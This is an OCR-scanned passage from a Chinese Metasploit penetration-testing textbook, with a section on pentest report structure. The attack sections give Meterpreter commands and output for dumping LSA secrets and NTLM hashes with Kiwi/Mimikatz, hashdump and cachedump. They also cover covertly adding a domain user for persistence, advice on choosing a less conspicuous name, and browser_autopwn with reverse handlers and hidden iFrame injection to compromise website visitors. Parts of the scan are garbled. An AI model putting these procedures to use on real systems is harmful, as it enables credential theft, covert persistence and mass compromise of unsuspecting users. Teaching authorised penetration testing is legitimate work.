入 kiwi， 如 下 图 所 示 。 





于 证 的 操作 的 Mimikatz 和 Kiwi 扩展 模块 ,它们 实现 了 密码 
黄金 票据 ( golden tickets ) 等 功能 。 首 先 在 Metasploit 中 载 


Lx 





EJ, 














meterpreter > load kiwi 
Loading extension kiwi... 


JHHHHE. — mimikatz 2.1.1 20170608 (x86/windows) 
HE ^ ##. "A La Vie, A L'Amour" 
H/ NGHE 8x 
JH \ / ## Benjamin DELPY ^gentilkiwi' ( benjaminggentilkiwi.com ) 
"HE v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) 
"HHRHH Ported to Metasploit by 0J Reeves `TheColonial` * * */ 


Loaded x86 Kiwi on an x64 architecture. 








成 功 载 人 kiwi 模块 之 后 , 就 可 以 看 到 这 























zin 


文 个 模块 中 提供 的 命令 菜单 了 , 具体 显示 的 内 容 如 下 所 示 。 














Kiwi Commands 





Command 

creds all 

creds kerberos 

creds msv 

creds ssp 

creds tspkg 

creds wdigest 

dcsync 

dcsync ntlm 

golden ticket create 
kerberos ticket list 
kerberos ticket purge 
kerberos ticket use 
kiwi cmd 

lsa dump sam 

l1sa dump secrets 
password change 

wifi list 
wifi list shared 





Description 

Retrieve all credentials (parsed) 

Retrieve Kerberos creds (parsed) 

Retrieve LM/NTLM creds (parsed) 

Retrieve SSP creds 

Retrieve TsPkg creds (parsed) 

Retrieve WDigest creds (parsed) 

Retrieve user account information via DCSync (unparsed) 
Retrieve user account NTLM hash, SID and RID via DCSync 
Create a golden kerberos ticket 

List all kerberos tickets (unparsed) 

Purge any in-use kerberos tickets 

Use a kerberos ticket 

Execute an arbitary mimikatz command (unparsed) 

Dump LSA SAM (unparsed) 

Dump LSA secrets (unparsed) 

Change the password/hash of a user 

List wifi profiles/creds for the current user 

List shared wifi profiles/creds (requires SYSTEM) 











下 面试 着 运 





云 行 1sa . dump secrets fi 











命令 ， 并 查看 我 们 是 否 可 以 导出 一 些 有 用 的 东西 








meterpreter > lsa dump secrets 
Running as SYSTEM 
[*] Dumping LSA secrets 
Domain : PYSSGDCOl 
SysKey : e8c68cddb3cac808d4d96bbf55a25249 


Local name : 
Domain FQDN : pyssg.com 


Policy subsystem is : 1.14 


Secret : $MACHINE.ACC 
|cur/hex : 2d 3e 75 f7 a7 
b6 4c c3 7f 73 fe 32 
63 ee f7 42 00 4b 65 
8d b9 17 c5 99 6e ff 
0f 3f 7a aa 74 1e 83 e3 78 11 la al 
62 11 3d dd ed 95 85 82 ff 09 72 65 
NTLM:dc9b526615a48c1919791df0a8701ced 
SHA1:6a558830a169218dc4d2e9dba6bdeaca0eee87e7 
old/hex : 97 74 2c f4 5e 9b c0 db 00 1d 93 4c b5 
69 2a bb 3c 46 42 ec af 18 fd 18 60 82 bg 66 f1 
64 3c f8 62 ef e9 06 51 4d b9 34 c7 1a 2c f6 f5 
0c 56 7f 12 7d b2 0a 7e af 0f 27 78 33 78 bg db 
a0 0a 6b 3e 8a 02 74 2e 4c 61 9a bb 47 57 77 að 
df 1d 28 34 db 16 db 99 ea b6 88 da 40 33 95 1d 
NTLM: 70765c4a590cd08949f0e1c03c56c576 
SHA1:62686f6cb72d06100ed627e3ab004b0461alcfec 


7f 45 47 30 
a5 4b b7 2d 
83 03 52 7b 
b8 17 3d 5f 


ef 
fi 
0a 
f9 
40 
ed 


40 
56 
ed 
4b 





PYSSGDC91 ( S-1-5-21-785378746-3992354771-1626871894 ) 
Domain name : PYSSG ( S-1-5-21-3559493541-3665875311-4193791800 ) 


LSA Key(s) : 1, default (63d35eca-7df6-6f77-7012-314f6c357a79) 
[00] (63d35eca-7df6-6f77-7012-314f6c357a79) 89b2fe01a4a5290b604467beeb6204c5cb03e204434393ab3e4007d172eb7670 


4b 
12 
e5 
b4 
ad 


d7 
a6 
ab 
32 
5f 


6f 
77 
ee 
9e 
b8 


44 
e8 
63 
1f 
d4 


13 
d4 
90 
e4 
d3 


06 
6f 
ef 
9d 
df 


72 
9d 
39 
c8 
5e 


09 
að 
60 
9a 
f2 


c2 
6c 
81 
eb 
db 


35 
27 
1c 
17 
ff 


94 
ea 
eb 
ed 
ad 
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干 得 漂亮 ! 显然 我 们 已 经 将 密码 的 NTLM 和 SHAT 散 列 值 导出 了 , 现在 我 们 已 经 拥有 大 量 可 以 用 

来 制作 黄金 票据 的 信息 了 。 不 过 ， 关 于 黄金 票据 的 内 容 要 在 后 面 的 章节 中 再 介绍 。 现 在 我 们 尝试 使 用 
hashaump 命令 来 导出 散 列 值 。 为 了 完成 这 个 操作 ,我 们 必须 迁移 到 一 个 用 户 进程 上 来 。 首 先 使 用 ps 
命令 列 出 所 有 的 进程 来 ， 如 下 图 所 示 。 

meterpreter > ps 

Process List 

PID  PPID Name Arch Session User Path 

o o [System Process] AOSA NES En 

4 e System x64 0 

68 560 svchost.exe x64 0 NT AUTHORITYASYSTEM C:\Windows\System32\svchost .exe 
260 4 smss.exe x64 0 

296 560  svchost.exe x64 9 NT AUTHORITYNNETWORK SERVICE C:\Windows\System32\svchost.exe 
352 344  csrss.exe x64 0 

424 416 csrss.exe x64 1 

444 344  wininit.exe x64 0 

452 736  RuntimeBroker.exe x64 1 PYSSGMAdministrator C: Windows NSystem32NRuntimeBroker. 
exe 

504 416 winlogon.exe x64 1 NT AUTHORITYASYSTEM C: Windows VSystem32Nwinlogon.exe 
560 444  services.exe x64 0 

576 444 lsass.exe x64 0 NT AUTHORITYASYSTEM C:\Windows\System32\lsass .exe 

736 560  svchost.exe x64 9 NT AUTHORITYNSYSTEM C:\Windows\System32\svchost .exe 
792 560  svchost.exe x64 0 NT AUTHORITYNNETWORK SERVICE C:\Windows\System32\svchost.exe 








迁移 到 lsass.exe 进程 上 ， 它 的 进程 ID 为 S76， 如 下 图 所 示 。 


太 
用 户 散 




















meterpreter > migrate 576 

[*] Migrating from 4388 to 576... 

[*] Migration completed successfully. 
meterpreter » hashdump 


Administrator:500:aad3b435b51404eeaad3b435b51404ee:6f7c99e58a96bf4f8bc0b1b994c9a524::: 


Guest:501:aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d7e0c089c0: : : 
krbtgt:502:aad3b435b51404eeaad3b435b51404ee: 9f1316057efa81de5fe61cd2bdc82ebl::: 


DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d7e0c089c0: : : 


deepankar:1104:aad3b435b51404eeaad3b435b51404ee :d25610e2120cc455310b026e845d38729: : : 
gaurav:1109:aad3b435b51404eeaad3b435b51404ee:b40e8a3a3e9959ddbe5bf2148e7c8350: : : 
deep:1110:aad3b435b51404eeaad3b435b51404ee:6f7c99e58a96bf4f8bc0b1b994c9a524: : : 
chaitanya:1112:aad3b435b51404eeaad3b435b51404ee:929886c777155f13ae0cdecb3cc40d2c: : : 
4n6:1115:aad3b435b51404eeaad3b435b51404ee : 50d6047860a3812e96efa5d6662290c5e: : : 
PYSSGDCO01$:1000:aad3b435b51404eeaad3b435b51404ee: dc9b526615a48c1919791df0a8701ced::: 
PYSSG002$:1107:aad3b435b51404eeaad3b435b51404ee: 1c0fa62921db154a7208b2ab628986e1: : : 
PYSSG003$:1113:aad3b435b51404eeaad3b435b51404ee : ed3907b2fcbbc8977df0a9f9c411970c: : : 
PYSSGV001$:1114:aad3b435b51404eeaad3b435b51404ee: 9077faa23ae59cba9cdc4199ac0dde3a: : : 
PYSSG005$:1116:aad3b435b51404eeaad3b435b51404ee : 77bdb47449cad5elecf8645d4e14fb18::: 
PYSSG004$ :1117:aad3b435b51404eeaad3b435b51404ee : 1037d462841261eba3d4d880835f17e4: : : 











TE f Y 我 们 已 经 成 功 地 将 这 个 进程 迁移 到 Isass.exe E, 3517 haskdump 命令 就 可 以 导出 所 有 的 





列 值 ， 我 们 一 会 将 破解 它们 。 


12. 使 用 Metasploit 中 的 cachedump 工具 
然 我 们 已 经 取得 了 一 个 高 级 的 访问 权限 ， 最 好 使 用 cachedump 来 获取 用 户 登 录 凭证 ， 如 下 图 


BE 
所 示 。 
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Imsf post(smart hashdump) > use post/windows/gather/cachedump 
msf post(cachedump) > show options 


Module options (post/windows/gather/cachedump): 


Name Current Setting Required Description 


SESSION 2 yes The session to run this module on. 


msf post(cachedump) » set SESSION 5 
SESSION => 5 
Imsf post(cachedump) > run 


[*] Executing module against PYSSGDCO1 
[*] Cached Credentials Setting: 10 - (Max is 50 and 0 disables, and 10 is default) 
[*] Obtaining boot key... 
[*] Obtaining Lsa key... 
[*] Vista or above system 
[*] Obtaining NL$KM... 
[*] Dumping cached credentials... 
[*] Hash are in MSCACHE VISTA format. (mscash2) 
MSCACHE v2 saved in: /root/.msf4/loot/20180330175351 default 192.168.0.190 mscache2.creds 173910.txt 
[*] John the Ripper format: 
# mscash2 





[*] Post module execution completed 





6.1.7 获取 Active Directory 的 持久 访问 权限 


我 们 之 前 已 经 了 解 了 实现 对 目标 系统 进行 持久 性 控制 的 很 多 方法 ,后 续 章 节 将 会 对 此 进行 更 详细 
的 介绍 。 在 一 个 拥有 众多 用 户 的 大 型 网 络 中 秘密 地 添加 一 个 用 户 以 保证 我 们 对 Active Directory 网 络 的 
持续 访问 ， 这 并 不 是 一 件 困 难 的 事 。 加 载 post/windows/manage/add user domain 模块 的 过 程 
如 下 所 示 。 










































































Imsf post(add user domain) > show options 
Module options (post/windows/manage/add user domain): 
Name Current Setting Required Description 
ADDTODOMAIN true yes Add user to the Domain 
ADDTOGROUP false yes Add user into Domain Group 
GETSYSTEM false yes Attempt to get SYSTEM privilege on the target host. 
GROUP Domain Admins yes Domain Group to add the user into. 
PASSWORD whateverQ123 no Password of the user (only required to add a user to the domain) 
SESSION 2 yes The session to run this module on. 
TOKEN no Username or PID of the Token which will be used. If blank, Domain Admin Tokens will be enume| 
rated. (Username doesnt require a Domain) 
USERNAME hacker yes Username to add to the Domain or Domain Group 

















可 以 看 到 这 里 面 已 经 设置 好 了 所 有 需要 的 参数 ， 例 如 USERNAME, PASSWORD 和 SESSION。 运 行 
这 个 模块 并 查看 我 们 的 用 户 是 不 是 已 经 添加 到 了 域 中 。 





























msf post(add user domain) > run 

[*] Running module on PYSSG002 

[-] Abort! Did not pass the priv check 

[*] Now executing commands as PYSSG\deep 

[*] Adding 'hacker' as a user to the PYSSG domain 
hacker is now a member of the PYSSG domain! 

[*] Post module execution completed 

msf post(add user domain) > fj 




















可 以 看 到 我 们 已 经 成 功 地 将 用 户 hacker 添加 到 了 evssc 域 中 。 我 们 可 以 轻松 地 使 用 这 个 用 户 随 
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意 登录 。 不 过 我 还 是 建议 你 使 有 
另外 ， 还 可 以 使 用 Loot 命令 来 查看 所 有 搜 








有 一 个 和 现 有 名 称 相似 的 用 户 名 ， 像 hacker 这 种 用 














户 名 未 人 免 太 显眼 了 。 














集 到 的 信息 的 细节 ， 如 下 图 所 示 。 





host service type 


192.168.0.190 
efault 192.168.0.190 mscache2.creds 173910.txt 

192.168.0.190 windows.hashes  PYSSGDCOl hashes.txt 
efault 192.168.0.190 windows.hashes 841700.txt 

192.168.0.196 ad.computers 

efault 192.168.0.196 ad.computers 287258.txt 





content 


text/csv 


info path 


MSCACHE v2 Credentials /root/.msf4/loot/20180330175351 d 
Windows Hashes 


text/plain /root/.msf4/100t/20180330174949 d 


text/plain /root/.msf4/100t/20180330165058 d 








6.2 ”手动 创建 报告 





现在 让 我 们 来 讨论 如 何 手动 创建 一 份 渗透 测试 报告 , 看 看 其 中 应 该 包括 哪些 内 容 ， 这 些 内 容 应 该 


放 在 什么 位 置 , 应 该 加 入 / 移 除 什么 ,如 何 规范 化 报告 的 格式 ， 以 及 如 何 使 有 














有 图 表 等 。 这 个 渗透 测试 的 








报告 将 会 被 很 多 人 阅读 , 例如 负责 人 、 管 理 员 、 








高 层 决 策 人 员 。 因 此 ,必须 将 所 有 资料 组 织 得 足够 好 ， 





这 样 我 们 所 要 表达 的 想法 才能 被 这 些 人 正确 至 


报告 的 格式 





6.2.1 


T 


一 份 合格 的 渗透 报告 可 以 按照 以 下 格式 进行 细 分 。 


口 页 面 设计 
a 文档 控制 
m 封面 

m 文档 属性 


口 报告 内 容 列表 
m HK 


m 搬 网 列表 
口 执行 摘要 
m 渗透 测试 适用 范围 
m 严重 性 信息 
目标 
m 假设 
漏洞 信息 摘要 
m 漏洞 分 布 图 
m 建议 摘要 
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OQ 方法 /技术 报告 
m 测试 细节 
m 漏洞 名 单 
m 可 能 性 
m 建议 
口 参考 文献 
口 词汇 表 
口 附录 
下 面 是 对 一 些 重要 步 又 的 简要 说 明 。 


口 页 面 设计 : 页 面 设 计 是 指 报告 中 使 用 的 字体 、 标 题 和 页 脚 、 颜 色 等 。 
口 文档 控制 : 这 部 分 包括 了 有 关 报 告 的 常规 属性 。 
口 封面 : 这 部 分 包括 报告 的 名 称 、 版 本 、 时 间 和 日 期 、 目 标 组 织 、 序 列 号 等 。 
口 文档 属性 : 这 部 分 包括 了 报告 的 标题 、 测 试 者 的 姓名 、 报 告 审查 者 的 姓名 。 
OQ 报告 内 容 列 表 : 这 部 分 包括 了 报告 的 各 部 分 内 容 以 及 它们 的 详细 页 码 。 

Q 目录 : 这 部 分 包含 了 从 报告 开始 到 结束 的 所 有 内 容 的 组 织 结 构 。 

口 插图 清单 : 报告 中 使 用 的 所 有 插图 及 其 页 码 都 在 这 里 出 现 。 


622 ”执行 摘要 


执行 摘要 是 对 完整 报告 的 总 结 ， 它 要 以 不 包含 专业 术语 的 一 般 语言 进行 叙述 ,侧重 于 向 高 级 管理 
人 员 提 供 信息 ， 通 常 包 含 以 下 信息 。 




























































































口 渗透 测试 适用 范围 : 这 一 节 包括 测试 的 类 型 以 及 测试 的 系统 信息 。 一 般 来 说 ， 要 测试 的 全 

部 IP 范围 都 应 在 这 一 节 中 列 出 。 此 外 ， 该 部 分 还 应 包括 有 关 测 试 严 重 性 的 信息 。 

O 目标 : 这 一 节 将 阐述 该 测试 如 何 能 够 帮助 目标 组 织 改 进 ， 以 及 该 测试 带 来 的 益处 ， 等 等 。 

口 假设 : 在 测试 阶段 中 做 出 的 任何 假设 都 应 该 在 这 里 列 出 。 假 设 我 们 在 被 测试 网 站 的 管理 面板 
中 发 现 了 一 个 XSS 漏洞 。 如 果 想 引发 这 个 漏洞 ， 我 们 需要 使 用 管理 员 权限 登录 。 在 这 种 情况 
下 ， 我 们 所 提出 的 假设 就 是 ， 需 要 管理 员 权限 来 执行 这 种 攻击 。 

口 漏洞 信息 摘要 : 这 部 分 以 表格 的 形式 描述 发 现 的 漏洞 数量 ， 将 按照 它们 的 危险 等 级 分 为 高 、 
中 、 低 三 个 级 别 ， 危 险 等 级 越 高 ， 造 成 的 破坏 越 大 。 这 个 阶段 含有 一 个 漏洞 分 布 图 表 ， 这 个 

表 包 括 了 多 个 系统 的 所 有 问题 信息 。 下 表 就 是 这 样 的 一 个 示例 。 







































































危险 等 级 漏洞 数量 
高 19 
中 15 
低 10 





口 建议 摘要 : 这 部 分 列举 出 来 的 建议 仅 是 针对 那些 影响 最 大 的 漏洞 。 
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6.2.3 ”管理 员 级 别 





管理 员 对 下 重 

















相关 数据 以 图 、 





易 度 以 及 成 功 渗 
O 建议 : 这 一 节 

















的 报告 








图 表 和 表格 的 














形式 进行 了 汇总 。 








口 可 能 性 : 这 一 部 分 解释 了 这 些 漏洞 被 攻 





口 漏洞 名 单 : 该 报告 的 这 部 分 包括 漏洞 的 细节 、 位 置 ， 以 及 产 4 























透 


认为 是 一 份 只 完成 了 一 半 的 工作 。 


6.2.4 附加 部 分 











6.3 ”小结 

















一些 脚本 、 代 码 和 


fF 者 利 月 








目标 漏洞 的 最 简单 方法 和 最 困难 方法 得 到 的 。 
! 给 出 了 漏洞 的 修复 方案 。 如 果 一 个 渗透 测试 不 能 给 出 漏洞 的 修复 方案 ， 则 被 





口 参考 文献 : 列举 出 这 份 报告 中 所 出 现 的 所 有 引 
些 引用 要 清楚 地 说 明 作 者 姓名 、 出 版 物 名 称 、 出 版 年 份 日 期 等 。 
口 词汇 表 : 这 份 报告 中 出 现 的 技术 术语 以 及 它 
口 附录 : 如 果 报 告 中 要 使 








j。 引 

















门 和 





j 的 来 源 包括 


该 漏洞 的 主要 原 
的 可 能 性 。 这 是 通过 分 析 触 发 特定 漏洞 的 难 





的 含义 都 出 现在 这 个 部 分 。 
图 片 ， 那 么 可 以 将 它们 放 在 附录 中 。 








图 书 、 网 页 、 


因 。 


文章 等 。 这 


报告 的 这 一 部 分 包括 了 渗透 测试 期 间 执行 的 所 有 步 又、 漏洞 的 深入 细节 以 及 修改 建议 。 一 般 来 说 ， 
j 列 出 的 内 容 更 感 兴趣 。 
口 测试 细节 : 报告 的 这 部 分 将 测试 过 程 中 的 安全 漏洞 、 风 险 因素 以 及 被 这 些 漏 洞 感染 的 系统 的 














这 


在 本 章 中 , 我 们 了 解 了 如 何 使 用 OpenVAS 内 置 的 连接 器 和 Metasploit 的 各 种 扩展 来 完成 网 络 上 的 


高 效 渗透 测试 , 以 及 如 何 生成 渗透 测试 报告 。 


例如 Nessus、SQLMAP 





在 下 一 章 中 ,我们 将 会 学 


等 。 


ZA 








击 载荷 交付 获取 那些 无 法 直接 渗透 的 系统 控制 权限 。 








习 如 何 使 用 Metasploit 完成 客户 端 攻击 ， 








Z4 


后 面 的 章节 中 还 会 介绍 Metasploit 中 的 更 多 内 置 连接 需 ， 





以 及 如 何 使 用 





社 


Zx 








工程 学 和 攻 




















在 前 面 的 章节 中 ， 我们 讨论 了 代码 编写 和 不 同 环境 下 的 渗透 测试 。 而 在 本 章 及 后 续 章 节 中 ,我们 
将 详细 介绍 客户 端 渗透 。 

本 音 将 着 眼 于 以 下 几 个 要 点 。 
口 对 目标 浏览 器 进行 攻击 。 
口 用 来 欺骗 用 户 的 复杂 攻击 向 量 。 
口 攻击 Android 和 使 用 Kali NetHunter。 
口 使 用 Arduino 进行 渗透 。 
O 将 攻击 载荷 模块 注入 到 各 种 文件 中 。 

基于 客户 端的 渗透 攻击 需要 得 到 目标 用 户 的 配合 才能 成 功 。 这 些 配合 包括 访问 恶意 网 址 、 打 开 或 
执行 一 个 文件 ， 等 等 。 这 意味 着 我 们 需要 得 到 被 害 者 的 配合 才能 成 功 地 渗透 进入 他 们 的 系统 。 因 此 ， 
被 害 者 的 配合 是 基于 客户 端的 渗透 攻击 的 一 个 关键 因素 。 

客户 端 系统 可 能 运行 着 多 种 不 同 的 应 用 程序 。 这 些 应 用 程序 ( 比如 PDF 阅读 器 、 文 字 处 理 软件 、 
媒体 播放 器 以 及 各 种 类 型 的 Web 浏览 器 ) 都 是 系统 中 的 基本 软件 。 本 章 将 发 气 各 种 应 用 程序 的 缺陷 ， 
这 些 缺 陷 可 能 导致 整个 系统 被 渗透 。 我 们 还 可 以 将 被 渗透 的 系统 作为 跳板 来 测试 整个 内 部 网 络 。 

首先 ， 介 绍 一 下 客户 端 渗透 攻击 的 多 种 技术 和 影响 客户 端 渗透 能 否 成 功 的 因素 。 
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Web 浏览 器 主要 用 于 网 上 冲浪 。 然而, 一 个 过 时 的 Web 浏览 器 却 可 能 导致 整个 系统 被 渗透 。 用 户 
通常 不 会 使 用 系统 预 装 的 Web 浏览 器 ， 而 是 会 按照 自己 的 喜好 来 自行 选择 。 但 是 ， 默 认 的 预 装 Web 
浏览 器 仍然 可 能 导致 系统 遭受 各 种 攻击 。 基 于 浏览 器 的 渗透 攻击 就 是 要 利用 浏览 器 的 漏洞 进行 渗透 。 

有 关 基 于 Firefox 的 漏洞 的 信息 ,请 访问 http://www.cvedetails.com/product/3264/Mozilla- 
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qp Firefox.html?vendor-id-452 7 
AAA TIE 897588 842 8. T3132 I9] http//www.cvedetails.com/product/9900/Microsoft-Internet- 
Explorer.html?vendor id=26。 
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7.1.1 browser autopwn 攻击 


























Metasploit 中 提供 了 一 个 browser autopwn 模块 ， 这 是 一 个 可 以 
的 自动 化 攻击 向 量 。 如 果 想 要 细致 地 了 解 这 个 模块 的 工作 原理 ， 我 人 
技术 原理 。 


1. browser autopwn 攻击 的 原理 


























日 来 对 各 种 浏览 器 进行 测试 和 渗透 
] 先 来 讨论 一 下 这 次 攻击 中 使 用 的 











autopwn 指 的 是 自动 对 目标 进行 渗透 。autopwn 模块 在 配置 了 所 有 要 使 用 的 浏览 带 渗 透 脚 本 后 , 将 
处 于 监听 模式 下 。 然 后 ， 它 便 等 待 着 一 个 即将 到 来 的 连接 。 一 旦 连接 建立 ， 它 就 会 发 送 一 系列 与 目标 
浏览 器 相 匹 配 的 渗透 模块 ,具体 发 送 哪个 模块 要 取决 于 受害 者 的 浏览 器 类 型 。 无论 目 标 系统 上 运行 着 























什么 浏览 器 ， 只 要 存在 漏洞 ，autopwn 模块 就 能 自动 发 起 攻击 。 
通过 下 面 的 图 来 了 解 一 下 这 个 攻击 向 量 的 工作 原理 。 
































服务 器 上 的 渗透 模块 















渗透 服务 器 识别 出 受 
害 者 所 使 用 的 浏览 器 
HE, MERANA 
统 发 送 了 对 应 的 渗透 
模块 









































权限 





渗透 用 的 handler 


基于 safari 浏 览 器 
的 渗透 模块 受害 者 和 渗透 服务 器 建立 连接 
(浏览 一 个 恶意 链接 ) 


在 目标 上 执行 渗透 模块 ， 并 
向 攻击 者 提供 Meterpreter 控 制 




















在 前 面 的 这 个 场景 中 ,一 个 用 来 渗透 的 服务 器 上 运行 着 大 量 的 基于 浏览 器 的 渗透 模块 ,同时 也 运 








行 着 它们 所 对 应 的 handler, 现在 一 旦 有 受害 者 的 浏览 器 连接 到 了 渗透 服务 器 上 , 该 服务 器 将 会 检查 浏 














览 器 的 类 型 并 找 出 对 应 该 浏览 器 的 渗透 模块 。 在 上 面 的 图 中 , 可 以 看 到 受害 者 使 用 的 是 IE, 因此 与 TE 

















相 匹配 的 渗透 模块 将 会 被 发 送 到 受害 者 的 浏览 器 中 以 获得 目标 的 控 


判 权 。 渗 透 模块 成 功 执行 后 将 会 返 





回 一 个 到 handler 的 连接 ， 攻 击 者 将 会 获得 目标 的 shell 或 者 Meterpreter 控制 权限 。 





2. 使 用 Metasploit 的 browser autopwn 模块 进行 浏览 器 攻击 

















使 用 Metasploit 中 的 browser_autopwn 模块 进行 一 次 针对 浏览 絮 的 渗透 攻击 ， 过 程 如 下 图 所 示 。 
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msf > use auxiliary/server/browser autopwn 
msf auxiliary(server/browser autopwn) » show options 


Module options (auxiliary/server/browser autopwn): 


Name Current Setting Required Description 

LHOST yes The IP address to use for reverse-connect payloads 

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 
SRVPORT 8080 yes The local port to listen on. 

SSL false no Negotiate SSL for incoming connections 

SSLCert no Path to a custom SSL certificate (default is randomly generated) 

URIPATH no The URI to use for this exploit (default is random) 


Auxiliary action: 


Name Description 


WebServer Start a bunch of modules and direct clients to appropriate exploits 


sf auxiliary(server/browser autopwn) > |j 














由 上 图 可 知 , 我 们 已 经 成 功 地 在 Metasploit 中 载 人 了 auxiliary/server/ 中 的 browser. autopwn2 模 
块 。 为 了 发 起 这 次 攻击 ， 需 要 指定 LHOST、URIPATH 和 SRVPORT 参数 。SRVPORT 参数 指定 了 渗透 服 
务 器 使 用 的 端口 。 我 建议 使 用 端口 80 或 者 端口 443， 因 为 使 用 其 他 端口 可 能 会 引起 别人 的 注意 , 而 且 
看 起 来 就 有 些 不 正常 。URIPATH 是 存储 各 种 渗透 模块 的 目录 路 径 ， 它 的 值 应 该 被 指定 为 /， 表 示 根 目 
录 。 在 设 定 好 所 有 所 需 的 参数 之 后 ， 就 可 以 如 下 图 所 示 启 动 模块 。 









































msf auxiliary(browser autopwn) > set LHOST 192.168.10.105 
LHOST => 192.168.10.105 

msf auxiliary (browser autopwn) > set URIPATH / 

URIPATH => / 

msf auxiliary(browser autopwn) » set SRVPORT 80 

SRVPORT => 80 

msf auxiliary (browser autopwn) > exploit 

[*] Auxiliary module execution completed 





[*] Setup 


[*] Starting exploit modules on host 192.168.10.105... 
[*] 一 一 一 


启动 prowser_autopwn 模块 之 后 就 会 建立 一 个 浏览 髓 渗透 服务 需 ， 它 会 开始 监听 状态 ， 等 待 到 
来 的 连接 ， 过 程 如 下 图 所 示 。 


Using URL: http://0.0.0.0:80/daKfwjZ 

Local IP: http://192.168.10.105:80/daKfwjZ 

Server started. 

Starting handler for windows/meterpreter/reverse tcp on port 3333 
Starting handler for generic/shell reverse tcp on port 6666 

] Started reverse TCP handler on 192.168.10.105:3333 

+] Starting the payload handler... 

Starting handler for java/meterpreter/reverse tcp on port 7777 
*] Started reverse TCP handler on 192.168.10.105:6666 

Starting the payload handler... 

] Started reverse TCP handler on 192.168.10.105:7777 

Starting the payload handler... 

















--- Done, found exploit modules 


Using URL: http://0.0.0.0:80/ 
Local IP: http://192.168.10.105:80/ 
Server started. 
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现在 任何 一 个 连接 
击 。 下 面 分 析 一 下 受害 











到 我 们 系统 的 80 端口 上 的 目标 都 会 遭 到 一 个 基于 它 所 使 用 的 浏览 器 的 渗透 攻 
者 是 如 何 连 接 到 渗透 服务 器 的 。 











@ Loading - Windows Internet Explorer 


O Q [Æ http://192.168.10.105/ 


jj Favorites | j3 @ | Suggested Sites v @) Web Slice Gallery v 


VE 


@ Loading ^H 





v Bex | 


























当 有 受害 者 访问 我 们 的 IP 地 址 时 , browser_autopwn 模块 就 会 向 其 发 送 各 种 漏洞 模块 ,直到 获 
得 Meterpreter 控制 权限 为 止 ， 如 下 图 所 示 。 








[*] Sending stage (957487 bytes) to 192.168.10.111 
[*] Meterpreter session 1 opened (192.168.10.105:3333 -» 192.168. 
10.111:51608) at 2016-06-30 11:48:29 +0530 
[*] Session ID 1 (192.168.10.105:3333 -» 192.168.10.111:51608) pr 
ocessing InitialAutoRunScript 'migrate -f' 
[*] Current server process: iexplore.exe (3728) 
[*] Spawning notepad.exe process to migrate to 
Migrating to 3700 
Successfully migrated to process 


msf auxiliary(browser autopwn) » sessions -i 


Active sessions 


Id Type Information 


meterpreter x86/win32 WIN-97G4SSDJD5SMApex @ WIN-97G4SSDJD 
HE 192.168.10.105:3333 -» 192.168.10.111:51608 (192.168.10.111) | 





msf auxiliary(browser autopwn) » | | | 











browser autopwn 模块 允许 我 们 使 用 各 种 漏洞 检测 模块 对 受害 者 的 浏览 器 进行 测试 和 渗透 。 不 
过 这 种 客户 端 渗透 可 能 会 引起 服务 中 断 ， 因 此 最 好 事先 获得 客户 的 许可 。 在 下 一 节 中 ,我 们 将 看 到 一 
个 模块 ( 比如 browser_autopwn ) 是 如 何 对 多 个 目标 进行 活 透 的 。 














7.1.2. ”对 网 站 的 客户 进行 渗透 


在 这 一 节 中 ， 我 们 来 尝试 将 这 次 普通 的 攻击 转化 为 威胁 性 更 大 的 攻击 。 
正如 上 一 节 演 示 的 一 样 ， 向 目标 发 送 一 个 IP 地 址 可 能 会 引起 注意 ， 受 害 者 可 能 会 对 你 发 送 的 IP 


地 址 产生 怀疑 。 不 过 如 
而 提高 渗透 的 成 功率 。 











Bu 





果 你 用 域名 地 址 取代 IP 地 址 发 送 给 受害 者 , 就 会 有 更 大 的 概率 蒙骗 受害 者 ,从 


1. 注入 恶意 网 页 脚本 
一 个 有 漏洞 的 网 站 可 以 成 为 browser autopwn 服务 器 的 俐 偶 。 攻 击 者 如 果 在 有 漏洞 的 网 站 中 和 藤 人 
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遭受 来 自 browser autopwn 服务 顺 的 攻击 。 因 此 ， 
届 洞 的 测试 。 








隐藏 的 iFrame， 那 么 访问 这 个 网 站 的 所 有 系统 都 会 
每 当 有 人 访问 这 个 被 注入 的 页 面 时 ，browser autopwn 渗透 服务 器 就 会 对 浏览 器 进行 各 种 ; 


在 大 多 数 情 况 下 ， 还 会 利用 找到 的 漏洞 进行 渗透 。 


我 们 可 以 使 用 iFrame 注入 实现 对 网 站 用 户 的 大 规模 入 侵 。 下 一 节 将 会 讲解 攻击 的 具体 细节 。 


2. 攻击 网 站 的 用 户 
下 图 讲解 了 如 何 实现 对 网 站 用 户 的 入 侵 。 

















































































































攻击 者 将 iFrame 注 入 受害 者 访问 被 利用 的 服务 
到 被 利用 的 服务 器 中 ， 器 后 ， 其 浏览 器 被 渗透 
(攻击 者 获得 了 她 系统 的 








iFrame 的 地 址 就 指向 
browser autopwn 服 务 器 ”控制 权限 ) 








攻击 者 建立 一 个 
1 browser autopwn 服 务 器 





m. 用 的 服务 器 








browser autopwn 服 务 器 











上 图 非常 清楚 地 说 明了 这 个 过 程 ， 现 在 来 了 解 具体 的 实现 过 程 。 这 次 攻击 最 重要 的 步 又 就 是 获取 


一 个 存在 漏洞 的 服务 器 的 控制 权限 。 下 图 给 出 了 一 个 关于 恶意 脚本 注入 的 详细 示例 。 











El 


28 国 c Q 


E MO example-demo.com, 
Uname :Windows NT DESKTOP-PESQ21S 6.2 build 9200 (Windows 8 Professional Edition) i586 [Google] [milwOrm] 


:0 ( Apex ) Group: 0 ( ? ) 
15.5.30 Safe mode: [ phpinfo ] Datetime: 2016-07-05 09:09:53 
1243.59 GB Free: 74.64 GB (3096) 


:C:/xampp/htdocs/site/ 
Drives :[c][d][e][y][z] 
[ Safe mode ] [ Sang tools [ Bruteforce ] [ Network ] [ Logout ] 


[ Console ] [ Sq! ] [ Php] 


[ home ] 


[ Sec. Info ] [ Files ] 


File tools 


Name: index.php Size: 2.18 KB Permission: Owner/Group: / 
Create time: 2016-05-28 14:25:16 Access time: 2016-05-28 14:25:16 Modify time: 2016-07-05 09:08:55 


View Highlight Download Hexdump [ Edit ] Chmod Rename Touch 
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这 里 使 用 一 个 存在 漏洞 的 Web 网 站 作为 示例 ,我 们 可 以 利用 这 个 漏洞 向 网 站 上 传 一 个 基于 第 三 方 
